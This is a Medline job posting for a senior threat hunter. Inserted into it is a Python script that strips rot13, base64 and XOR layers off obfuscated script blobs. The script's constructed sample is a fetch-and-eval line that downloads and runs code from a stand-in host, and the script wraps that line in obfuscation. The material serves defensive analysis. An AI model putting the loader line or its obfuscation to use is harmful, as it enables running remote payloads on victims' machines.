Sr Analyst IT Security Threat (Threat Hunter)

CORP- Libertyville

JOB SUMMARY

The IT Senior Security Threat Analyst (aka Threat Hunter) performs a wide variety of security duties with a primary focus on threat actor tactics, techniques, and procedures (TTPs). Managing multiple simultaneous threat hunts spanning several platforms and TTPs is a key function of this role. Knowledge sharing and mentoring, both within the team and across the wider organization, is a critical skill. Must be able to operate under pressure and steer the team dynamic when responding to incidents. Security knowledge must be current, and the candidate must be able to draw on many resources, including open source intelligence. Improving the team and its processes over time in a well-established manner, and acting as an escalation point, are critical functions of this role.

MAJOR RESPONSIBILITIES

Threat Hunting - 3 years' Experience

  • Create advanced correlation rules with low false positive rates.

  • Explain, identify, and detect malicious activity within environments with a high level of accuracy and confidence.

  • Deobfuscate JavaScript, Visual Basic, and PHP, and reverse single-step encodings and ciphers such as base64, rot13, and single-byte XOR keys.

  • Locate Cyber Threat Intelligence with appropriate context and prioritization.

  • Sort and curate incoming intelligence, and document locally produced intelligence.

  • Build Diamond Model analyses (adversary, capability, infrastructure, victim) of threat activity.

  • Identify gaps in the Threat Hunting Program and help drive meaningful improvements.

  • Proactively mentor analysts and threat hunters who want to develop their skillset.

  • Work directly with management to seek out opportunities to develop and improve internal processes.
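The "single-step encodings" line above is the kind of hands-on triage a hunter does when a dropper or loader hides its real payload behind a stack of trivial transforms. The following Python is an added illustration, not code from this posting or from Medline: it peels rot13, base64, and single-byte XOR layers off a blob by depth-first search until the result looks like a script. The sample blob is constructed inside the block (a JS-style fetch-and-eval one-liner wrapped as XOR, then base64, then rot13), and the marker list and printable-ratio threshold are assumptions chosen for this example.

```python
"""Peel single-step encodings (rot13, base64, single-byte XOR) off an
obfuscated script blob, the way a hunter triages a dropper by hand."""
import base64
import re
import string

B64_RE = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")
PRINTABLE = set(string.printable.encode())
# Assumed plaintext markers: each contains a byte outside the base64 alphabet,
# so an undecoded base64/rot13 layer cannot accidentally match one.
SCRIPT_MARKERS = (b"eval(", b"http://", b"https://", b"document.write(", b"WScript.Shell")


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII (0.0 for empty input)."""
    return sum(b in PRINTABLE for b in data) / len(data) if data else 0.0


def looks_like_script(data: bytes) -> bool:
    """Stop condition: mostly printable and carrying a marker an analyst expects."""
    return printable_ratio(data) > 0.95 and any(m in data for m in SCRIPT_MARKERS)


def rot13(data: bytes) -> bytes:
    """Byte-wise rot13; only ASCII letters move, so it is its own inverse."""
    out = bytearray()
    for b in data:
        if 0x41 <= b <= 0x5A:
            out.append((b - 0x41 + 13) % 26 + 0x41)
        elif 0x61 <= b <= 0x7A:
            out.append((b - 0x61 + 13) % 26 + 0x61)
        else:
            out.append(b)
    return bytes(out)


def try_base64(data: bytes):
    """Strict base64 decode: alphabet, padding position and length all checked."""
    stripped = data.strip()
    if len(stripped) % 4 or not B64_RE.match(stripped):
        return None
    try:
        return base64.b64decode(stripped, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def best_single_byte_xor(data: bytes):
    """Brute-force all 255 non-zero keys; return (key, plaintext) for the most
    script-like result, or None if no key yields one."""
    best = None
    for key in range(1, 256):
        cand = bytes(b ^ key for b in data)
        if looks_like_script(cand):
            score = printable_ratio(cand)
            if best is None or score > best[2]:
                best = (key, cand, score)
    return None if best is None else (best[0], best[1])


def peel(blob: bytes, max_depth: int = 6):
    """Depth-first search over the three transforms. Returns (steps, plaintext)
    or None. XOR is only tried as the final layer: brute-forcing it under
    every branch is where the cost would otherwise be."""
    def walk(data, steps):
        if looks_like_script(data):
            return steps, data
        if len(steps) >= max_depth:
            return None
        decoded = try_base64(data)
        if decoded is not None and decoded != data:
            found = walk(decoded, steps + ["base64"])
            if found:
                return found
        rotated = rot13(data)
        if rotated != data and (not steps or steps[-1] != "rot13"):  # rot13 twice is a no-op
            found = walk(rotated, steps + ["rot13"])
            if found:
                return found
        hit = best_single_byte_xor(data)
        if hit:
            return steps + [f"xor:0x{hit[0]:02x}"], hit[1]
        return None
    return walk(blob, [])


def obfuscate(plain: bytes, key: int) -> bytes:
    """Constructed-sample builder: XOR, then base64, then rot13 (reverse of peel order)."""
    return rot13(base64.b64encode(bytes(b ^ key for b in plain)))


# Constructed sample, not a real dropper: a JS-style fetch-and-eval one-liner.
SAMPLE_PLAIN = b'var u = "http://example.invalid/p.bin"; eval(fetch(u));'
SAMPLE_BLOB = obfuscate(SAMPLE_PLAIN, 0x5A)

if __name__ == "__main__":
    steps, plain = peel(SAMPLE_BLOB)
    print(" -> ".join(steps), ":", plain.decode())
```

The search order matters: base64 is tried first because a successful strict decode is strong evidence, rot13 second because it is cheap and self-inverting, and XOR last because it is a brute-force step that should only be paid once a candidate is otherwise exhausted. The marker check is what keeps a wrong path from being accepted, which is also why the markers were chosen to include characters outside the base64 alphabet.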

MINIMUM JOB REQUIREMENTS

Education

High School Diploma and relevant experience.

Certification / Licensure

None

Work Experience

At least 3 years of experience directly in a threat hunting role.

Knowledge / Skills / Abilities

  • Advanced experience with threat hunting activities and theory.

  • Knowledge of the current e-crime threat landscape.

  • Ability to identify and categorize malicious activity attributed to human threat actors.

  • Ability to mentor less experienced team members in a positive and constructive manner.

PREFERRED JOB REQUIREMENTS

Education

Degree or coursework in Data Science, Statistics, Computer Science, Criminal Justice, Reverse Engineering, or Security Tool Development.

Certification / Licensure

Technical and strategic certifications or courses specific to penetration testing or threat hunting, such as:

  • SANS courses

  • OSCP courses

  • Black Hills InfoSec / Antisyphon / Red Canary / Mandiant advanced coursework

Work Experience

Experience with detection engineering.

Experience with malware analysis.

Experience with APT/Crimeware ecosystems.

Experience with the MITRE ATT&CK framework.

Knowledge / Skills / Abilities

  • Proven leadership experience

  • Mastery of threat analytics

  • Advanced CTI knowledge

  • Proven alert creation and tuning capability

  • Mastery of sorting and curating both incoming intelligence and locally created intelligence

Benefits - Medline is committed to offering competitive benefits and a variety of choices to best meet the needs of you and your family. For employees scheduled to work at least 30 hours per week, this includes health and well-being, financial fitness, career development, paid time off and more. Employees scheduled to work less than 30 hours per week can participate in the 401(k) plan, access the Employee Assistance Program (EAP), Employee Resource Groups (ERG) and Medline Service Corps.

Every day, we're focused on building a more diverse and inclusive company, one that recognizes, values and respects the differences we all bring to the workplace. From doing what's right to delivering business results, together, we're better.

Medline Industries, LP is an equal opportunity employer. Medline evaluates qualified applicants without regard to race, color, religion, gender, national origin, age, sexual orientation, gender identity or expression, protected veteran status, disability/handicap status or any other legally protected characteristic.


Region: North America
Country: United States